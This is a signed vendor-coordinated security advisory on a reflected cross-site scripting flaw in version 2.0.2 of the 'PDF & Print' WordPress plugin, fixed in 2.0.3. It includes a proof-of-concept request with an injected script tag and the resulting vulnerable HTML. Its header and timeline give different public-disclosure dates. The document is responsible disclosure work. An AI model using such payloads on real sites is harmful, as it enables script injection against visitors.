-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2018-014 Product: PDF & Print Manufacturer: Bestwebsoft Affected Version: 2.0.2 Tested Version: 2.0.2 Vulnerability Type: Cross-Site-Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2018-08-24 Solution Date: 2018-09-13 Public Disclosure: 2018-09-28 CVE Reference: - Author of Advisory: Robin Trost, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: PDF & Print is a Wordpress Plugin which allows a user to generate a PDF file from the Blog post or print it. The manufacturer describes the product as follows (see [1]): "With this plugin you can create PDF files and print pages quickly. Add PDF & print buttons to WordPress website pages, posts, and widgets. Generate documents with custom styles and useful data for archiving, sharing, or saving." Due to improper encoding the plugin is vulnerable to reflected cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The called URL gets reflected in the <href> tag for the "View PDF" and "Print Content" Buttons. Because the GET-parameter names did not get encoded it is possible to execute JavaScript trough the URL. The value of the GET-parameter is encoded correctly, but the name of the GET-parameter is not encoded which leads to the Cross-Site-Scripting. This vulnerability affects all Blog Posts or Wordpress Sites where the "View PDF" or "Print Content" Button is displayed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): GET /index.php/2018/07/25/hello-world/?param1=10"><&10"><script>alert (10);</script><href=" HTTP/1.1 [...] That request results in the <script> tag from the URI Path being embedded in the response in two places so that a browser will execute the JavaScript code. [...] <div class="pdfprnt-buttons pdfprnt-buttons-post pdfprnt-top-right"> <a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello- world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href=" &print=pdf" class="pdfprnt-button pdfprnt-button-pdf" target= "_blank"> <img src="http://<WORDPRESS BASE URL>/wp-content/plugins/ pdf-print/images/pdf.png" alt="image_pdf" title="View PDF" /> </a> <a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello- world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href=" &print=print" class="pdfprnt-button pdfprnt-button-print" target= "_blank"> <img src="http://<WORDPRESS BASE URL>/wp-content/plugins/ pdf-print/images/print.png" alt="image_print" title="Print Content" /> </a> </div> [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to version 2.0.3 of PDF & Print More Information: https://bestwebsoft.com/products/wordpress/plugins/pdf-print/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-07-25: Vulnerability discovered 2018-08-24: Vulnerability reported to manufacturer 2018-09-13: Patch released by manufacturer 2018-10-28: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for PDF & Print https://bestwebsoft.com/products/wordpress/plugins/pdf-print/ [2] SySS Security Advisory SYSS-2018-014 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/ SYSS-2018-014.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Robin Trost of SySS GmbH. E-Mail: robin.trost at syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/ Robin_Trost.asc Key ID: 0x698E6EB3 Key Fingerprint: 85FE 80E2 04F3 6177 C61A 4618 61DE F14F 698E 6EB3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEhf6A4gTzYXfGGkYYYd7xT2mObrMFAlut4ccACgkQYd7xT2mO brObOhAAl+WrB0zN0LquBAIPenAln2KyyeyoIVlIqavqfnop/t5RHruZdY1KVAQ6 0kcTLi/177eAE0Wzwi6GZunfLKiYR4yHdSQEKJ3FUCxY/sj9SvgQQFS7+3bKZRsw ojTG+0J9yklBmVZwBmIoV77Ca9d5qgd44tvfff3OCV1zsIPE91FYb8gNsT7MRHwp 3aw7tFd9xjwpoV/aERXPEURPrGCWC71SS0r5M1aEh5n65gF77HecWZeB2LNodJpI Q5AHd+8fRtfdagLaBe4ws9qQdB+M7FqUcCPSXnRBsyBSr/4DRa1cl5I/i3AMr81K m82tmGtflk62YPTQ0EXINw7LLvFOX0sSTK8z/M6vii3O6aBu03Aj1irlixZqDJa5 CTRvXBBXzA35oUJw9Usi+RjG+90PTizOd5HetDWx4k5UEdnYWwNlICN9iIBZHPOo 1b7yqX9E7FIB8elgjphaNpAr2NHyWZS0MeFNi7MAemfWWkrV4st6uHXYJYzvueNH LnUff8QrE3sVWR+6n7PH+c9IcSU9QvCZg67U0Sg90CSs87eTHLE+IHJ2VmycXTm+ IWPR7EU5PYUMsm8MzcCYNjE4Bxq0Jwx5w8/MXKi0PXvCCrf+zR8Y/bjBaoAy4PUy s7Z80TFrzQVy4r6xzyWOzJTKe+5ncjWLZYrkAsVGr+W+zhQsGFQ= =bW9N -----END PGP SIGNATURE-----